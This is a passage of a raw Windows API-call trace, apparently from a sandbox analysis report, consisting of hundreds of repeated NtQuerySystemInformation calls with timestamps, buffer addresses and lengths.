ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.020] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0273.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.021] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.022] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.023] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0273.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.026] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4d0, Length=0x20, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc450, Length=0x20, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.027] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.028] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.030] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc540, Length=0x28, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc5b0, Length=0x28, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.031] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.033] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc630, Length=0x28, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x20, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.034] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc710, Length=0x38, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc590, Length=0x20, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc520, Length=0x20, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7f0, Length=0x58, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.035] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.037] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.039] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc510, Length=0x28, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc580, Length=0x28, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.040] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0273.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0273.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.041] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc600, Length=0x28, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0273.043] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc470, Length=0x20, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc3f0, Length=0x20, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.044] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc640, Length=0x20, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.045] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4e0, Length=0x20, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc6d0, Length=0x38, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc560, Length=0x20, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc4f0, Length=0x20, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.046] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfca58, Length=0x50, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.047] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0273.048] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc7b0, Length=0x28, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc820, Length=0x28, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0273.049] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.050] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x28, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc8a0, Length=0x28, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc980, Length=0x38, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc800, Length=0x20, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.052] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfc780, Length=0x20, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0273.053] NtQuerySystemInformation (SystemInformationClass=0xb9, 